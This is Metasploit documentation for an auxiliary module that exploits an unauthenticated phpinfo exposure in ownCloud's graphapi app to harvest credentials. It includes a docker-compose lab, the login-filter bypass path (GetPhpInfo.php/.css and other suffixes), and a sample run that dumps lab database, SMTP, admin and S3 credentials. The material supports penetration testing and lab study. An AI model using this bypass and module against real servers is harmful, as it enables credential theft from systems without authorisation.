ContextQMD
Back to Metasploit Framework

Owncloud Phpinfo Reader

documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md

6.4.1315.6 KB
Original Source

Vulnerable Application

Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app graph installed contain a test file which prints phpinfo() to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter. Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.

Docker-Compose Build

Using docker-compose we can build a fairly robust system with plenty of information to pilfer.

Based off of Ron Bowes Blog Post

A list of environment variables is posted here

version: "3"

services:
  owncloud:
    image: owncloud/server:10.12.1
    container_name: owncloud_server
    restart: always
    ports:
      - 8080:8080
    depends_on:
      - mariadb
      - redis
    environment:
      - OWNCLOUD_DOMAIN=localhost:8080
      - OWNCLOUD_TRUSTED_DOMAINS=localhost
      - OWNCLOUD_DB_TYPE=mysql
      - OWNCLOUD_DB_NAME=owncloud
      - OWNCLOUD_DB_USERNAME=owncloud
      - OWNCLOUD_DB_PASSWORD=owncloud
      - OWNCLOUD_DB_HOST=mariadb
      - OWNCLOUD_ADMIN_USERNAME=admin_username
      - OWNCLOUD_ADMIN_PASSWORD=admin_password
      - OWNCLOUD_MYSQL_UTF8MB4=true
      - OWNCLOUD_REDIS_ENABLED=true
      - OWNCLOUD_REDIS_HOST=redis
      - APACHE_LOG_LEVEL=trace6
      - OWNCLOUD_MAIL_SMTP_PASSWORD=smtp_password
      - OWNCLOUD_MAIL_SMTP_NAME=smtp_username
      - OWNCLOUD_LICENSE_KEY=1122333
      - OWNCLOUD_OBJECTSTORE_KEY=owncloud123456
      - OWNCLOUD_OBJECTSTORE_SECRET=secret123456
      - OWNCLOUD_OBJECTSTORE_REGION=us-east-1
    healthcheck:
      test: ["CMD", "/usr/bin/healthcheck"]
      interval: 30s
      timeout: 10s
      retries: 5

  mariadb:
    image: mariadb:10.11 # minimum required ownCloud version is 10.9
    container_name: owncloud_mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=owncloud
      - MYSQL_USER=owncloud
      - MYSQL_PASSWORD=owncloud
      - MYSQL_DATABASE=owncloud
      - MARIADB_AUTO_UPGRADE=1
    command: ["--max-allowed-packet=128M", "--innodb-log-file-size=64M"]
    healthcheck:
      test: ["CMD", "mysqladmin", "ping", "-u", "root", "--password=owncloud"]
      interval: 10s
      timeout: 5s
      retries: 5

  redis:
    image: redis:6
    container_name: owncloud_redis
    restart: always
    command: ["--databases", "1"]
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 10s
      timeout: 5s
      retries: 5

You may need to add an aditional entry to OWNCLOUD_TRUSTED_DOMAINS which has the IP address of the host, such as OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1

If the graph app needs to be installed, use the following instructions:

docker exec -it owncloud_server /bin/bash
cd apps
wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
rm -rf graphapi
tar -zxf graphapi-0.3.0.tar.gz
occ app:enable graphapi

Verification Steps

  1. Install the application and plugin
  2. Start msfconsole
  3. Do: use auxiliary/gather/owncloud_phpinfo_reader
  4. Do: set rhost [ip]
  5. Do: run
  6. You should information from the system configuration

Options

ROOT

Root path of the URI, which is different than TARGETURI as its ownCloud specific. Defaults to all which will try '' (empty), and owncloud

ENDFILE

The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to all which will try /.css, /.js, /.svg, /.gif, /.png, /.html, /.ttf, /.woff, /.ico, /.jpg, /.jpeg, /.json, /.properties, /.min.map, /.js.map, /.auto.map

Scenarios

ownCloud 10.12.1 from Docker Compose

resource (owncloud.rb)> use auxiliary/gather/owncloud_phpinfo_reader
resource (owncloud.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (owncloud.rb)> set verbose true
verbose => true
resource (owncloud.rb)> run
[*] Running module against 127.0.0.1
[*] Checking: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Loot stored to: /home/h00die/.msf4/loot/20231203153109_default_127.0.0.1_owncloud.phpinfo_453632.txt
[+] License Key: 1122333
[+] Hostname: b2b16d6f3ba6
[+] Home: /root
[+] Server Root: /var/www/owncloud
[+] PWD: /var/www/owncloud
[+] SMTP Username: smtp_username
[+] SMTP Password: smtp_password
[+] ownCloud Username: admin_username
[+] ownCloud Password: admin_password
[+] DB Host: mariadb:3306
[+] DB Username: owncloud
[+] DB Password: owncloud
[+] DB Name: owncloud
[+] Redis Host: redis
[+] Redis Port: 6379
[+] Objectstore Endpoint: https://s3.us-east-1.amazonaws.com
[+] Objectstore Region: us-east-1
[+] Objectsore Secret: secret123456
[+] Objectstore Key: owncloud123456
[+] Objectstore Bucket: owncloud
[+] Credentials
===========

  Type             Host            Username             Password              Notes
  ----             ----            --------             --------              -----
  S3 Object Store  us-east-1       Key: owncloud123456  Secret: secret123456  Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
  SMTP             127.0.0.1:25    smtp_username        smtp_password
  mysql            127.0.0.1:8080  owncloud             owncloud
  ownCloud         127.0.0.1:8080  admin_username       admin_password

[*] Auxiliary module execution completed